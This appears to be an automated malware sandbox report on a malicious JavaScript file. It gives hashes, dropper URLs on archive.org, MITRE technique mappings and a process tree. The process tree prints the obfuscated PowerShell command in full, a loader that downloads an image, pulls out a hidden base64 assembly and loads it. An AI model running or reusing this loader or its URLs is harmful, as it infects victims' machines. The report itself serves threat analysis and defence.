f7012ceb3f5f17167f1b0eb83dc97b3064ea92dc81d1151a2218112895142afd

General

Target

f7012ceb3f5f17167f1b0eb83dc97b3064ea92dc81d1151a2218112895142afd.js
Size

329KB
MD5

b4105714b83cef4f0d8d859364cd6322
SHA1

448f53b0c979beb7305db50a282bef00043e6840
SHA256

f7012ceb3f5f17167f1b0eb83dc97b3064ea92dc81d1151a2218112895142afd
SHA512

91a19c5e098351e053de13d4c8ebe3677f2fec4aac7a63169a30ea147c75b0ce734e11011724ff6d7be7e7b2311ce9663ef9b6c52f2172febaca2c2f7cb03f0a
SSDEEP

768:P7rCumqiWTinPK6eOK6mW3XKqe+KqmG9NqaeOqamWX3qKuH+qKmGxBK6eOK6mW3G:rdvJ5strohpUtg1vx

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2928 powershell.exe
6 2928 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1056 powershell.exe
2928 powershell.exe
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1056 powershell.exe
2928 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1056 powershell.exe
Token: SeDebugPrivilege 2928 powershell.exe

flow	pid	process
5	2928	powershell.exe
6	2928	powershell.exe

pid	process
1056	powershell.exe
2928	powershell.exe

pid	process
1056	powershell.exe
2928	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

wscript.exepowershell.exe

description	pid	process	target process
PID 2380 wrote to memory of 1056	2380	wscript.exe	powershell.exe
PID 2380 wrote to memory of 1056	2380	wscript.exe	powershell.exe
PID 2380 wrote to memory of 1056	2380	wscript.exe	powershell.exe
PID 1056 wrote to memory of 2928	1056	powershell.exe	powershell.exe
PID 1056 wrote to memory of 2928	1056	powershell.exe	powershell.exe
PID 1056 wrote to memory of 2928	1056	powershell.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\f7012ceb3f5f17167f1b0eb83dc97b3064ea92dc81d1151a2218112895142afd.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´VQBy䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´JwBo䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´Og䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´aQBh䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´x䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´dQBz䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´YQBy䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´HY䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´cgBn䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´MQ䷡ ㌝ ₋ ⊩ ´w䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´aQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBz䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bo䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´bwB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´Xw䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Nw䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQBh䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´Bu䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´agBw䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´dwBl䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´QwBs䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´ZQBu䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´TgBl䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´LQBP䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´agBl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´TgBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBX䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´YgBD䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´aQBl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´ZQBi䷡ ㌝ ₋ ⊩ ´EM䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgB0䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´R䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´bgBs䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YQBk䷡ ㌝ ₋ ⊩ ´EQ䷡ ㌝ ₋ ⊩ ´YQB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´K䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBV䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´EU䷡ ㌝ ₋ ⊩ ´bgBj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZwBd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBV䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´Rg䷡ ㌝ ₋ ⊩ ´4䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´RwBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´UwB0䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´aQBu䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´K䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBC䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´8䷡ ㌝ ₋ ⊩ ´Dw䷡ ㌝ ₋ ⊩ ´QgBB䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´RQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´XwBT䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´QQBS䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´Pg䷡ ㌝ ₋ ⊩ ´+䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´8䷡ ㌝ ₋ ⊩ ´Dw䷡ ㌝ ₋ ⊩ ´QgBB䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´RQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´XwBF䷡ ㌝ ₋ ⊩ ´E4䷡ ㌝ ₋ ⊩ ´R䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´+䷡ ㌝ ₋ ⊩ ´D4䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBU䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´E8䷡ ㌝ ₋ ⊩ ´Zg䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´ZQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´TwBm䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BG䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cs䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´LgBM䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´YgBh䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´T䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZwB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´YQBy䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BD䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBT䷡ ㌝ ₋ ⊩ ´HU䷡ ㌝ ₋ ⊩ ´YgBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´cgBp䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Zw䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´s䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BM䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´QwBv䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´dgBl䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBG䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwBt䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´YQBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´Ng䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´By䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BD䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´bwBh䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQBk䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBi䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´eQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´UgBl䷡ ㌝ ₋ ⊩ ´GY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bg䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBi䷡ 